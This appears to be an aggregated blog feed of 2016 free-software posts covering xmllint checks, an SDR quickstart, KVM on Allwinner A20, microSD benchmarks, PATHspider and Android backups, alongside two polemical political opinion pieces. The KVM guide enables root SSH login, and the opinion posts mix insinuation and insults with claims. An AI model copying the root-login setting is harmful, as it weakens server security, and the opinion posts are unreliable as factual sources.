In general, it’s good to check the XHTML syntax before editing and committing files to the SVN. The script fsfe-preview already contains these checks, but it’s useful to be able to run them on their own as well. If you didn’t already do it before, install libxml2-utils on your computer. It contains xmllint, a syntax checker for XML files. You can use it like this:

xmllint --noout work.en.xhtml

If there’s no output (--noout), the file has correct syntax and you’re ready to continue. But you may also see something like

work.en.xhtml:55: parser error : Opening and ending tag mismatch: p line 41 and li
      </li>
           ^

In this case, this means that the <p> tag starting in line 41 isn’t closed properly.

Drawbacks

The presented process and script have a few drawbacks. For example, you aren’t able to preview certain very dynamic pages or parts of pages, or those depending on CGI scripts. In most cases you’ll never encounter these, but if you’re getting active in the FSFE’s webmaster team it may happen that you’ll have to fall back on the standard central build system.

Any other issues? Feel free to report them, as fixing them will help FSFE’s editors work more efficiently :-)

Changelog

29 November 2016: Jonas has pointed out a few bugs and issues with a different GNU/Linux distribution. Should be resolved.

Are all victims of French terrorism equal?

DanielPocock.com - fsfe | 10:50, Sunday, 13 November 2016

Some personal observations about the terrorist atrocities around the world based on evidence from Wikipedia and other sources

The year 2015 saw a series of distressing terrorist attacks in France. 2015 was also the 30th anniversary of the French Government's bombing of a civilian ship at port in New Zealand, murdering a photographer who was on board at the time. This horrendous crime has been chronicled in various movies including The Rainbow Warrior Conspiracy (1989) and The Rainbow Warrior (1993).

The Paris attacks are a source of great anxiety for the people of France but they are also an attack on Europe and all civilized humanity as well. Rather than using them to channel more anger towards Muslims and Arabs with another extended (yet ineffective) state of emergency, isn't it about time that France moved on from the evils of its colonial past and "drains the swamp" where unrepentant villains are thriving in its security services?

François Hollande and Ségolène Royal. Royal's brother Gérard Royal allegedly planted the bomb in the terrorist mission to New Zealand. It is ironic that Royal is now Minister for Ecology while her brother sank the Greenpeace flagship. If François and Ségolène had married (they have four children together), would Gérard be the president's brother-in-law or terrorist-in-law?

The question has to be asked: if it looks like terrorism, if it smells like terrorism, if the victim of that French Government atrocity is as dead as the victims of Islamic militants littered across the floor of the Bataclan, shouldn't it also be considered an act of terrorism?

If it was not an act of terrorism, then what is it that makes it differ? Why do French officials refer to it as nothing more than "a serious error", the term used by Prime Minister Manuel Valls during a visit to New Zealand in 2016? Was it that the French officials felt it was necessary for Liberté, égalité, fraternité? Or is it just a limitation of the English language that we only have one word for terrorism, while French officials have a different word for such acts carried out by those who serve their flag?

If the French government are sincere in their apology, why have they avoided releasing key facts about the atrocity, like who thought up this plot and who gave the orders? Did the soldiers involved volunteer for a mission with the code name Opération Satanique, or did any other members of their unit quit rather than have such a horrendous crime on their conscience? What does that say about the people who carried out the orders?

If somebody apprehended one of these rogue employees of the French Government today, would they be rewarded with France's highest honour, like those tourists who recently apprehended an Islamic terrorist on a high-speed train?

If terrorism is such an absolute evil, why was it so easy for the officials involved to progress with their careers? Would an ex-member of an Islamic terrorist group be able to subsequently obtain US residence and employment as easily as the French terror squad's commander Louis-Pierre Dillais?

When you consider the comments made by Donald Trump recently, the threats of violence and physical aggression against just about anybody he doesn't agree with, is this the type of diplomacy that the US will practice under his rule commencing in 2017? Are people like this motivated by a genuine concern for peace and security, or are these simply criminal acts of vengeance backed by political leaders with the maturity of schoolyard bullies?

Wednesday, 09 November 2016

OpenRheinRuhr 2016 – A report of iron and freedom

English – Max's weblog | 21:55, Wednesday, 09 November 2016

orr2016_iron

Our Dutch iron fighters

Last weekend, I visited Oberhausen to participate in OpenRheinRuhr, a well-known Free Software event in north-western Germany. Over two days I was part of FSFE’s booth team, gave a talk, and enjoyed talking to tons of like-minded people about politics, technology and other stuff. In the next few minutes you will learn what coat hangers have to do with flat irons and which hotel you shouldn’t book if you plan to visit Oberhausen.

On Friday, Matthias, Erik, and I arrived at the event location, which normally is a museum collecting memories of heavy industry in the Ruhr area: old machines, the history and background of industry workers, and pictures of people fighting for their rights. Because we arrived a bit too early, we helped the (fantastic!) orga team with some remaining work in the exhibition hall before setting up FSFE’s booth. While doing so, we already sold the first t-shirt and baby romper (is this a new record?) and had nice talks. Afterwards we enjoyed a free evening and prepared for the next busy day.

But Matthias and I faced a bad surprise: our hotel rooms were built for midgets and lacked a few basic features. For example, Matthias‘ room had no heating, and in my bathroom someone had stolen the shelf. At least I was given a bedside lamp – except for the little fact that the architect forgot to install a socket nearby. Another (semi-)funny bug was the emergency exits in front of our doors: when escaping from dangers inside the hotel, taking these exits won’t rescue you but instead increase the probability of dying from severe bone fractures. So if you ever need a hotel in Oberhausen, avoid City Lounge Hotel by any means. Pictures at the end of this article.

orr2016_hall1

The large catering and museum hall

On Saturday, André Ockers (NL translation coordinator), Maurice Verhessen (Coordinator Netherlands), and Niko Rikken from the Netherlands joined us to help at the booth and connect with people. Amusingly, we learnt again that communication gets more confusing the shorter it is. While Matthias thought that he had asked Maurice to bring an iron clothes hanger, Maurice thought he should bring a flat iron. Because he only had one (surprisingly), he asked Niko to bring his as well. While we wondered why Maurice only had one clothes hanger, our Dutch friends wondered why we would need two flat irons ;-)

Over the day, Matthias, Erik, and I gave our talks: Matthias spoke about common misconceptions about Free Software and how to clear them up, Erik explained how people can synchronise their computers and mobile phones with Free Software applications, and I motivated people to become politically active by presenting some lessons learned from my experiences with the Compulsory Routers and Radio Lockdown cases. There were many other talks by FSFE people, for example by Wolf-Dieter and Wolfgang. In the evening we enjoyed the social event with barbecue, free beer, and loooooong waiting queues.

Sunday was far more relaxed than the day before. We had time to talk to more people interested in Free Software and exchanged ideas and thoughts with friends from other initiatives. Among many others, I spoke with people from Freifunk, a Pirate Party politician, a tax consultant with digital ambitions, two system administrators, and a trade unionist. But even the nicest day has to end, and after we packed up the whole booth, merchandise and promotion material again, André took the remainders to the Netherlands where they will be presented to the public at FSFE’s T-DOSE booth.

Understanding what lies behind Trump and Brexit

DanielPocock.com - fsfe | 08:23, Wednesday, 09 November 2016

As the US elections finish, many people are scratching their heads wondering what it all means. For example, is Trump serious about the things he has been saying, or is he simply saying whatever was most likely to make a whole bunch of really stupid people crawl out from under their rocks to vote for him? Was he serious about winning at all, or was it just the ultimate reality TV experiment? Will he show up for work in 2017, or like Australia's billionaire Clive Palmer, will he set a new absence record for an elected official? Ironically, Palmer and Trump have both been dogged by questions over their business dealings, will Palmer's descent towards bankruptcy be replicated in the ongoing fraud trial against Trump University and similar scandals?

While the answer to those questions may not be clear for some time, some interesting observations can be made at this point.

The world has been going racist. In the UK, for example, authorities have started putting up anti-Muslim posters with an eerie resemblance to Hitler's anti-Jew propaganda. It makes you wonder whether the Brexit result was really the "will of the people", or whether the people were deliberately whipped up into a state of irrational fear by a bunch of thugs seeking political power?

Who thought The Man in the High Castle was fiction?

In January 2015, a pilot of The Man in the High Castle, telling the story of a dystopian alternative history where Hitler has conquered America, was the most-watched original series on Amazon Prime.

It appears Trump supporters have already been operating US checkpoints abroad for some time, achieving widespread notoriety when they blocked a family of British Muslims from visiting Disneyland in 2015. The family was ambushed at the last moment as they were about to board their flight; it is unthinkable how anybody could be so cruel. When you reflect on statements made by Trump and the so-called "security" practices around the world, this would appear to be only a taste of things to come, though.

Is it a coincidence that Brexit and Trump both happened in the same year that the copyright on Mein Kampf expired? Ironically, in the chapter on immigration Hitler specifically singles out the U.S.A. for praise; is that the sort of rave review that Trump aspires to when he talks about making America great again?

US voters have traditionally held concerns about the power of the establishment. The US Federal Reserve has been in the news almost every week since the financial crisis, but did you know that the very concept of central banking was thrown out the window four times in America's history? Is Trump the type of hardliner who will go down this path again, or will it be business as usual? In the book Rich Dad's Guide to Investing in Gold & Silver, Robert Kiyosaki and Michael Maloney encourage people to consider putting most of their wealth into gold and silver bullion. Whether you like the politics of Trump and Brexit or not, are we entering an era where it will be prudent for people to keep at least ten percent of net wealth in this asset class again? Online dealers like BullionVault in Europe already appear to be struggling under the pressure as people rush to claim the free grams of bullion credited to newly opened accounts.

The Facebook effect

In recent times, there has been significant attention on the question of how Facebook and Google can influence elections; some European authorities have even issued alerts comparing this threat to terrorism. Yet in the US election, it was simple email that stole the limelight (or conveniently diverted attention from other threats), first with Clinton's private email server and later with Wikileaks exposing the entire email history of Clinton's chief of staff. The Podesta emails, while being boring for outsiders, are potentially far more damaging as they undermine the morale of Clinton's grass roots supporters. These people are essential for knocking on doors and distributing leaflets in the final phase of an election campaign, but after reading about Clinton's close relationship with big business, many of them may well have chosen to stay home. Will future political candidates seek to improve their technical competence, or will they simply be replaced by candidates who are born hackers and fluent in the language of a digital world?

Monday, 07 November 2016

Quickstart SDR with gqrx, GNU Radio and the RTL-SDR dongle

DanielPocock.com - fsfe | 19:56, Monday, 07 November 2016

Software Defined Radio (SDR) provides many opportunities for both experimentation and solving real-world problems. It is not exactly a new technology but it has become significantly more accessible due to the increases in desktop computing power (for performing the DSP functions) and simultaneous reduction in the cost of SDR hardware.

Thanks to the availability of a completely packaged gqrx and GNU Radio solution, you can now get up and running in less than half an hour while spending less than fifty dollars/pounds/euros.

We provided a full demo of the Debian Hams gqrx solution at Mini DebConf Vienna (video) and hope to provide a similar demo at MiniDebConf Cambridge on the coming weekend of 12-13 November.

gqrx is also available for Fedora users.

Choosing hardware

There are many different types of hardware, ranging from the low-cost RTL-SDR USB dongles to full duplex multi-transceiver systems.

My recommendation is to start with an RTL-SDR dongle due to its extremely low cost; this will give you an opportunity to reflect on the opportunities of this technology before putting money into one of the transceivers and their accessories. The RTL-SDR dongle also benefits from being a small self-contained solution that you can carry around and experiment with or demo just about anywhere.

Important: Don't buy the cheapest generic RTL TV/radio receivers. It is absolutely essential to buy one of the units that has been explicitly promoted for SDR. These typically have a temperature compensated crystal oscillator (TCXO), which is needed for the reception of narrowband voice and digital signals. Without it, it is only possible to receive wideband broadcast FM radio and TV channels.

For those who want to try it out with us at MiniDebConf Cambridge, Technofix has UK stock (online ordering), they are about £26.

Getting gqrx up and running fast

Note: to avoid the wrong kernel module being loaded automatically, it is recommended that you don't connect the RTL-SDR dongle before you install the packages. If you did already connect it, you may need to reboot or rmmod dvb_usb_rtl28xxu.
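To keep the wrong module from ever claiming the dongle again, the DVB-T driver can also be blacklisted permanently (a config sketch; the file name under /etc/modprobe.d/ is arbitrary, and the module name matches the rmmod command above):

```
# /etc/modprobe.d/blacklist-rtl-sdr.conf
# Keep the DVB-T TV driver from claiming RTL-SDR dongles at boot/hotplug
blacklist dvb_usb_rtl28xxu
```

After creating the file, re-plug the dongle (or reboot) so the blacklist takes effect.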

If you are using a Debian jessie system, you can get all the necessary packages from jessie-backports.

If you haven't already enabled backports, you can do so with a command like this:


$ echo "deb http://ftp.ch.debian.org/debian jessie-backports main" | sudo tee -a /etc/apt/sources.list

Make sure your local index is updated and then install the necessary packages:


$ sudo apt-get update
$ sudo apt-get install -t jessie-backports gqrx-sdr rtl-sdr

Running it for the first time

Once the packages are installed, connect the RTL-SDR dongle to the computer and then start the gqrx GUI from a terminal:


$ gqrx

If the GUI fails to appear, look carefully at the error messages. It may be that the wrong kernel module has been loaded.

When the properties window appears, select the RTL-SDR dongle:

Now the main screen will appear. Choose the wideband FM mode "WFM (mono)" and change the frequency to a value in the FM broadcast band such as 100MHz. Click the "Power on" button in the top left corner, just under the "File" menu, to start reception. Click in the middle of a strong signal to tune to that station. If you don't hear anything, check the squelch setting (it should be more negative than the signal strength value) and increase the Gain control at the bottom right hand side of the window.

Looking for ham / amateur radio signals

A popular band for hams is between 144 - 148 MHz (in some countries only a subset of this band is used). This is referred to as the two-meter band, as the wavelength is approximately two meters at these frequencies.
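The band's name follows directly from the wave equation λ = c / f. A quick sanity check of that arithmetic (a self-contained sketch using awk, since no SDR tooling is needed for it):

```shell
# Wavelength in metres = speed of light / frequency; check the
# "two-meter" name for 146 MHz, the middle of the 144-148 MHz band.
awk 'BEGIN { c = 299792458; f = 146e6; printf "%.2f m\n", c / f }'
# prints: 2.05 m
```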

Hams often use the narrowband FM mode in this band, especially with repeater stations. Change the "Mode" setting from "WFM" to "Narrow FM" and change the frequency to a value in the middle of the band. Look for signals in the radio spectrum and click on them to hear them.

If you are not sure which part of the band to look in, search for the two-meter band plan for your country/region and look for the repeater output frequencies in the band plan.

Sunday, 06 November 2016

KVM virtualization with Allwinner A20 on Debian: libre, low-power, low-cost

Daniel's FSFE blog | 14:33, Sunday, 06 November 2016

Introduction

Various cheap ARM boards based on the Allwinner A20 SoC have been available for a few years already. The first EOMA68 computer [1] will also be based on this chipset. Not many users know that the Allwinner A20 supports hardware-assisted virtualization as well. Its Cortex-A7 cores allow running hardware-accelerated ARM virtual machines (guests) using KVM or Xen.

While Allwinner has been accused of violating the GPL for years [2], their A20 SoC is imho one of the best choices today when it comes to building a small and libre server for SOHO use (thanks to the hard work of the Allwinner-independent Linux-Sunxi community). While many SoCs found on popular boards like those from the Raspberry Pi family require proprietary blobs, the A20 works with a free bootloader and requires no proprietary drivers or firmware for basic operation.

The virtualization on A20 hosts works out of the box on Debian Jessie with the stock kernel and official packages in main — without cross-compiling, patching or other tinkering (this was not the case in the past, see [3]). This also means that updating your host and guests later will be easy and painless. Creating and managing guests can be done with virt-manager [4] – a secure and comfortable graphical user interface licensed under GPLv3.

After first discussing some A20 hardware options, this guide takes the example of the Olimex “A20-OLinuXino-LIME2” board [5] and shows how to turn it into a virtualization host. It then shows how to create and manage guest VMs on this host. The guide assumes that you are running a GNU/Linux-based desktop system from which you want to manage the A20 device.

Disclaimer


All data and information provided in this article is for informational purposes only. The author makes no representations as to the accuracy, completeness, currentness, suitability, or validity of any information in this article and will not be liable for any errors, omissions, or delays in this information or for any losses, injuries, or damages arising from its display or use. All information is provided on an as-is basis.

In no event will the author be liable for any loss or damage including, without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of, or in connection with, the use of this article.

Hardware choices

There are plenty of boards with the Allwinner A20. However, only a few are known to work out of the box on Debian Jessie. The corresponding page on the Debian Wiki [6] mentions the following boards in particular:

  • Cubietech Cubieboard2
  • Cubietech Cubieboard3 (“Cubietruck”)
  • LeMaker Banana Pro
  • Olimex A20-OLinuXino-LIME
  • Olimex A20-OLinuXino-LIME2 (only the regular one, not the eMMC variant!)
  • Olimex A20-OLinuXino Micro

While some of these boards feature Gigabit Ethernet and SATA, only the Cubieboard 3 has 2 GB of RAM. To me, this seems to be the best choice for an A20-based KVM virtualization host. Since I only had a spare Olimex A20-OLinuXino-LIME2 board at hand, this guide uses this board as an example.

Beware: The “A20-OLinuXino-LIME2” and the “A20-OLinuXino-LIME2-eMMC” are not the same! Debian provides no firmware for the “A20-OLinuXino-LIME2-eMMC”, and although I thought the two boards would be identical except for the eMMC flash, the firmware for the regular “A20-OLinuXino-LIME2” did NOT work on the eMMC variant for me at all.

Base installation

The article in the Debian wiki provides the necessary information on installing Debian Jessie using the text-based Debian-Installer. Make sure you have a microSD card with good 4K random I/O performance, or the installation will take forever and your A20 system will run terribly slowly afterwards (see my article comparing the performance of various microSD cards).

If you don’t have a serial cable and want to install using the HDMI output, you need to use the installer images from unstable. The easiest way to do this is to fetch the firmware file from unstable and the partition image from Jessie. Then write them to your microSD card (replace /dev/sdX with your particular device):

$ zcat firmware.A20-OLinuXino-Lime2.img.gz partition.img.gz > /dev/sdX
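The single zcat call works because zcat decompresses each argument in order and concatenates the results, so the firmware image lands first on the card, followed by the partition image. A self-contained sketch of that behaviour with throwaway files:

```shell
# Demonstrate that zcat concatenates multiple .gz inputs in order --
# the same mechanism that writes firmware + partition back-to-back.
printf 'firmware' | gzip > part1.gz
printf 'partition' | gzip > part2.gz
zcat part1.gz part2.gz > combined.bin
cat combined.bin
# prints: firmwarepartition
```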

Next, insert the microSD card into your device, connect your device to your LAN and power it up. Then install Debian as usual using the text-based installer. During the installation, make sure to create a root account (needed for KVM) and an ext2 boot partition (the safest method here is to use the guided installer). When tasksel gets called, make sure to install the tasks/packages “SSH Server” and “Standard system utilities”.

Note for users of the German mirrors: Using the mirror “ftp.de.debian.org” will break your installation as something seems to be missing there as of 2016-11-05. Using “ftp2.de.debian.org” works fine.

Installing the KVM virtualization

By default, interactive root logins are not allowed on Debian. Therefore, make sure you copy over your SSH public key to your a20-box or simply enable interactive root logins over SSH by changing the following option in /etc/ssh/sshd_config:

#PermitRootLogin without-password
PermitRootLogin yes

Then restart the SSH server:

# service ssh restart

Now you should be able to log in directly as root. Next, install the virtualization packages:

# apt install libvirt-daemon-system
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following extra packages will be installed:

...

0 upgraded, 105 newly installed, 0 to remove and 0 not upgraded.
Need to get 44.4 MB of archives.
After this operation, 182 MB of additional disk space will be used.
Do you want to continue? [Y/n]

Now fire up virt-manager on your desktop and make sure you can connect to your a20-box:

Creating and installing a guest

For running ARM virtual machines you need a kernel and DTBs which support the VExpress-A15 chipset (the ARM reference board usually emulated on ARM). This is already provided in stock Debian, so there is no need to compile anything yourself.

Regarding the guest, you can choose any Linux distribution you want. In the following example, we will install a Debian Jessie guest using the Debian installer, so we need to download the installer to the virtualization host. This time, we don’t need a partition image but can use the usual installer initrd image from the Debian servers. SSH into the virtualization host and download it:

wget http://ftp.uk.debian.org/debian/dists/jessie/main/installer-armhf/current/images/netboot/initrd.gz -O initrd-installer-jessie.gz

For the installation, you will also need a different kernel: the kernel installed on the host ships its network drivers in the initrd, while the installer’s initrd assumes they are built into the kernel. Therefore, fetch a kernel for the installer:

wget http://ftp.uk.debian.org/debian/dists/jessie/main/installer-armhf/current/images/netboot/vmlinuz -O vmlinuz-installer-jessie

Now, fire up virt-manager on your desktop and connect to the virtualization host. Then, start the wizard for creating guests using “create new virtual machine”. On the first screen, change the machine type to “vexpress-a15”:

On the next screen, specify a storage volume (just create one using the dialog behind “Browse”), and also use “Browse” to locate the kernel and initrd images so that you specify the ones we just downloaded. For the DTB, we’ll use the one that is part of Debian’s stock kernel and resides under /usr/lib/linux-image-3.16.0-4-armmp-lpae/vexpress-v2p-ca15-tc1.dtb (make sure it corresponds to the kernel version on your a20-host! TODO: Is there any symlink which points to the current version?). The kernel args are also very important, or you will not get any output. For this line, specify the following:

root=/dev/vda1 console=ttyAMA0,115200 rootwait

Finally, select OS type and version appropriately. Your dialog should look like this:

Then, specify RAM (e.g. 256MB) and the number of CPUs (e.g. 1) you want to give the guest and jump to the last screen. Here, give your guest a nice name and make sure you check the “Customize configuration before install” checkbox before you click “Finish”:

Otherwise, you would end up with an error message like this:

Unable to complete install: 'internal error: early end of file from monitor: possible problem:
kvm_init_vcpu failed: Invalid argument

In the configuration of the VM, under “Processor”, change the configuration from “Hypervisor Default” to “Application Default”:

To get better performance, also change the BUS of your virtual disk to “VIRTIO” (by default, it would emulate an SD card):

And do the same for the network adapter:

Finally, fire up the guest using “Begin installation”. If everything goes fine, you should see the kernel boot and be presented with the welcome screen of the installer. For jessie, it should look like this:

If you selected the kernel and initrd from stretch/sid you should get a nicer color screen (make sure you set the baud rate of the console to 115200 or you will get a distorted output!):

When partitioning the guest, just create a single root partition spanning the whole (virtual) device. The guest will always boot using externally specified kernels, dtbs and initrds; therefore, there is no point in creating a /boot partition as the “guided install” would do.

Near the end of the installation, you will be notified that no bootloader could be installed. You can safely ignore this message:

After finishing the installation, the system will boot again into the installer because the initrd is still active. To change this, power off the guest (“Force Off”) and specify in the boot options to use the kernel and initrd image of your A20 host instead (whenever they will be updated on the host, the guests will also get the update on their next boot):

Now your guest should finally succeed to boot up:

And you can check that it indeed uses the current A20 kernel of the host and virtualizes the VExpress-A15 board:

Benchmarks

Finally, I want to provide some benchmarks so you can get a feeling about the impact of the virtualization. The benchmarks were done using a guest with 2 CPUs and 512MB memory assigned.

IO/Performance

For a first I/O benchmark, I used hdparm.

On the host:

$ hdparm -tT /dev/mmcblk0
/dev/mmcblk0:
 Timing cached reads:   814 MB in  2.00 seconds = 406.33 MB/sec
 Timing buffered disk reads:  66 MB in  3.01 seconds =  21.93 MB/sec

On the guest:

$ hdparm -tT /dev/vda
/dev/vda:
 Timing cached reads:   694 MB in  2.00 seconds = 346.49 MB/sec
 Timing buffered disk reads:  30 MB in  3.15 seconds =   9.52 MB/sec

CPU processing

For benchmarking processing, I used the openssl suite to do a few simple AES benchmarks:

$ openssl speed aes

On the host:

...
The 'numbers' are in 1000s of bytes per second processed.
type             16 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
aes-128 cbc      20267.83k    22390.70k    23325.10k    23575.89k    23642.11k
aes-192 cbc      17594.13k    19464.20k    19956.57k    20102.83k    20146.86k
aes-256 cbc      15727.25k    17158.89k    17592.58k    17706.67k    17738.41k

On the guest:

...
The 'numbers' are in 1000s of bytes per second processed.
type             16 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
aes-128 cbc      19784.01k    22100.48k    22697.56k    23272.20k    23288.29k
aes-192 cbc      17363.72k    19097.02k    19643.68k    19786.41k    19800.53k
aes-256 cbc      15455.28k    16939.28k    17374.44k    17415.85k    17504.58k

Conclusion

With one of the Allwinner A20 boards supported by Debian, you can easily build a tiny virtualization host that can handle a few simple VMs and draws only 2-3W of power. While this process was pretty cumbersome in the past (you had to cross-compile kernels etc.), thanks to the efforts of the Debian project and the Linux-Sunxi community, it is now pretty straightforward with only a few caveats involved. This might also be an interesting option if you want to run a low-power virtualization cluster on fully libre software down to the firmware level.

References

[1] https://www.crowdsupply.com/eoma68/micro-desktop
[2] http://linux-sunxi.org/GPL_Violations
[3] http://blog.flexvdi.com/2014/07/28/enabling-kvm-virtualization-on-arm-allwinner-a20/
[4] https://virt-manager.org/
[5] https://www.olimex.com/Products/OLinuXino/A20/A20-OLinuXIno-LIME2/
[6] https://wiki.debian.org/InstallingDebianOn/Allwinner

Saturday, 05 November 2016

Benchmarking microSD cards

Daniel's FSFE blog | 18:56, Saturday, 05 November 2016

Motivation

If you ever tried using a microSD card for your root or home filesystem on a small computing device or smartphone, you have probably noticed that microSD cards are in most cases a lot slower than integrated eMMC flash. Since most filesystems use 4k blocks, the random write/read performance with 4k blocks is what matters most in such scenarios. And while microSD cards don’t come close to internal flash in these disciplines, there are significant differences between the models.

Jeff Geerling [1,2] has already benchmarked the performance of various microSD cards on different models of the “blobby” Raspberry Pi. I had a number of different microSD cards at hand and I tried to replicate his results on my sample.

Disclaimer


All data and information provided in this article is for informational purposes only. The author makes no representations as to the accuracy, completeness, currentness, suitability, or validity of any information in this article and will not be liable for any errors, omissions, or delays in this information or for any losses, injuries, or damages arising from its display or use. All information is provided on an as-is basis.

In no event will the author be liable for any loss or damage including, without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of, or in connection with, the use of this article.

Environment and tools

Just like Jeff, I used the source-available (but non-free) tool “iozone” [3] in the current stable version available on Debian Jessie (3.429). Instead of using a Raspberry Pi, I used a cheap microSD/SD-to-USB-2.0 adapter made by Logilink [4] connected to a desktop PC.

I disabled caches and benchmarked on raw devices to avoid measuring filesystem overhead. Therefore, I used the following call to iozone to run the benchmarks (/dev/sde is my sdcard):

$ iozone -e -I -a -s 100M -r 4k -r 512k -r 16M -i 0 -i 1 -i 2 -f /dev/sde

Benchmarked microSD cards and results

The following table provides the results I obtained (rounded to 10 kB/s):

Manufacturer Make / model Rating Capacity 16M seq. read (MB/s) 16M seq. write (MB/s) 4K rand. read (MB/s) 4K rand. write (MB/s)
Adata ? C4 32 GB 9.58 2.97 2.62 0.64
Samsung Evo UHS-1 32 GB 17.80 10.13 4.45 1.32
Samsung Evo+ UHS-1 32 GB 18.10 14.27 5.28 2.86
Sandisk Extreme UHS-3 64 GB 18.44 11.22 5.20 2.36
Sandisk Ultra C10 64 GB 18.16 8.69 3.73 0.80
Toshiba Exceria UHS-3 64 GB 16.10 6.60 3.82 0.09
Kingston ? C4 8 GB 14.69 3.71 3.97 0.18

Discussion, conclusion and future work

I can confirm Jeff’s results about microSD cards and would also recommend the Evo+, which has the best 4K random write performance of the sample. On the other hand, I am very disappointed by the Toshiba Exceria card. Actually, running a device on this card with very sluggish performance was the reason I started this benchmark initiative. And indeed, after switching to the Evo+, the device feels much snappier now.

I think it would be interesting to add more cards to this benchmark (not only microSD but also regular SD cards and maybe also CF cards). Also, using fio instead of the non-free iozone might be interesting. Furthermore, doing the benchmarks internally on the device or using a faster USB 3.0 card reader might also be interesting.
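As a starting point for such a fio run, a job file roughly mirroring the 4k random part of the iozone call above might look like this (a sketch of fio's job-file syntax; it targets a plain file rather than the raw device to avoid accidental data loss):

```
; rand4k.fio -- 100 MiB working set, direct I/O, 4k random read then write
[global]
filename=/tmp/fio-testfile
size=100m
bs=4k
direct=1

[randread]
rw=randread

[randwrite]
stonewall
rw=randwrite
```

Run it with `fio rand4k.fio` and compare the reported results with the 4K columns of the table above.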

References

[1] http://www.pidramble.com/wiki/benchmarks/microsd-cards
[2] http://www.jeffgeerling.com/blogs/jeff-geerling/raspberry-pi-microsd-card
[3] http://www.iozone.org/
[4] http://www.logilink.eu/Products_LogiLink/Notebook-Computer_Accessories/Card_Reader/Cardreader_USB_20_Stick_external_for_SD-MMC_CR0015.htm

Thursday, 03 November 2016

PATHspider Plugins

Iain R. Learmonth | 23:46, Thursday, 03 November 2016

This post is cross-posted on the MAMI Project blog here.

In today’s Internet we see an increasing deployment of middleboxes. While middleboxes provide in-network functionality that is necessary to keep networks manageable and economically viable, any packet mangling — whether essential for the needed functionality or accidental as an unwanted side effect — makes it more and more difficult to deploy new protocols or extensions of existing protocols.

For the evolution of the protocol stack, it is important to know which network impairments exist and potentially need to be worked around. While classical network measurement tools are often focused on absolute performance values, PATHspider performs A/B testing between two different protocols or different protocol extensions to perform controlled experiments of protocol-dependent connectivity problems as well as differential treatment.

PATHspider 1.0.1 has been released today and is now available from GitHub, PyPI and Debian unstable. This is a small stable update containing a documentation fix for the example plugin.

PATHspider now contains 3 built-in plugins for measuring path transparency to explicit congestion notification, DiffServ code points and TCP Fast Open. It’s easy to write your own plugins, and if they’re good enough, they may be included in the PATHspider distribution at the next feature release.

We have a GitHub repository you can fork that has a premade directory structure for new plugins. You’ll need to implement logic for performing the two connections, for the A and the B tests. Once you’ve verified your connection logic is working with Wireshark, you can move on to writing Observer functions to analyse the connections made in real time as PATHspider runs. The final step is to merge the results of the connection logic (e.g. did the operating system report a timeout?) with the results of your observer functions (e.g. was ECN successfully negotiated?) and write out the final result.

We have dedicated a section of the manual to the development of plugins and we really see plugins as first-class citizens in the PATHspider ecosystem. While future releases of PATHspider may contain new plugins, we’re also making it easier to write plugins by providing reusable library functions such as the tcp_connect() function of the SynchronisedSpider that allows for easy A/B testing of TCP connections with any globally configured state set. We also provide reusable observer functions for simple tasks such as determining if a 3-way handshake completed or if there was an ICMP unreachable message received.


If you’d like to check out PATHspider, you can find the website at https://pathspider.net/.

Current development of PATHspider is supported by the European Union’s Horizon 2020 project MAMI. This project has received funding from the European Union’s Horizon 2020 research and innovation programme under grant agreement No 688421. The opinions expressed and arguments employed reflect only the authors’ view. The European Commission is not responsible for any use that may be made of that information.

Wednesday, 02 November 2016

Backing up and restoring data on Android devices directly via USB (Howto)

Daniel's FSFE blog | 21:28, Wednesday, 02 November 2016

Motivation

I was looking for a simple way to backup data on Android devices directly to a device running GNU/Linux connected over a USB cable (in my case, a desktop computer).

Is this really so unique that it’s worth writing a new article about it? Well, in my case, I did not want to buffer the data on any “intermediate” devices such as storage cards connected via microSD or USB-OTG. Also, I did not want to use any proprietary tools or formats. Instead, I wanted to store my backups in “oldschool” formats such as dd-images or tar archives. I did not find a comprehensive howto for that, so I decided to write this article.

Disclaimer


All data and information provided in this article is for informational purposes only. The author makes no representations as to the accuracy, completeness, currentness, suitability, or validity of any information in this article and will not be liable for any errors, omissions, or delays in this information or for any losses, injuries, or damages arising from its display or use. All information is provided on an as-is basis.

In no event will the author be liable for any loss or damage including, without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of, or in connection with, the use of this article.

Overview

This article describes two different approaches. Both have their pros and cons:

  • Block-level: Doing 1:1 block-level backups (above the file system) is an imaging approach that corresponds to doing dd-style backups.
  • Filesystem-level: Doing filesystem-level backups (on the file system) corresponds to tar-style backups.

Performance is also an important factor when doing backups. Filesystem-level backups are usually faster on block devices that are only filled up to a small degree. However, due to the file system overhead, they have a lower “raw” throughput rate — especially when backing up data on flash media such as microSD cards. Here, typical filesystems such as ext4 or f2fs operating with a 4K block size are a major bottleneck, as these media often have horrible 4k write/read performance.

The following instructions for applying these approaches assume that you already have a “liberated” Android device which can boot into TWRP (a free Android recovery) or CWM. I am using the example of a Nexus-S running Replicant 4.2.0004 and TWRP 2.8.7.0, but the approaches also work with most other Android distributions and recoveries.

Getting familiar with the block devices on your Android device

First of all, you should know which block device you actually want to backup. The internal flash on Android devices is usually partitioned in about 15-25 partitions, depending on the device. To get a first overview, you can try the following (I am using adb shell on the desktop):

$ adb shell cat /proc/partitions

major minor #blocks name

31 0 2048 mtdblock0
31 1 1280 mtdblock1
31 2 8192 mtdblock2
31 3 8192 mtdblock3
31 4 480768 mtdblock4
31 5 13824 mtdblock5
31 6 6912 mtdblock6
179 0 15552512 mmcblk0
179 1 524288 mmcblk0p1
179 2 1048576 mmcblk0p2
179 3 13978607 mmcblk0p3
179 16 1024 mmcblk0boot1
179 8 1024 mmcblk0boot0

To find out what the partitions are about, you can inspect the directory /dev/block/platform/<platform-device>/by-name/ which contains symlinks to the actual partitions. In my case, the Nexus-S has two flash chips and I am listing the partitions of the one on which the userdata partition resides:

$ adb shell ls -l /dev/block/platform/s3c-sdhci.0/by-name

lrwxrwxrwx root root 2016-11-02 19:51 media -> /dev/block/mmcblk0p3
lrwxrwxrwx root root 2016-11-02 19:51 system -> /dev/block/mmcblk0p1
lrwxrwxrwx root root 2016-11-02 19:51 userdata -> /dev/block/mmcblk0p2

Please note that unlike the Nexus-S, most newer Android devices only have a single eMMC flash chip and don't use MTD devices anymore.

Block-level approach

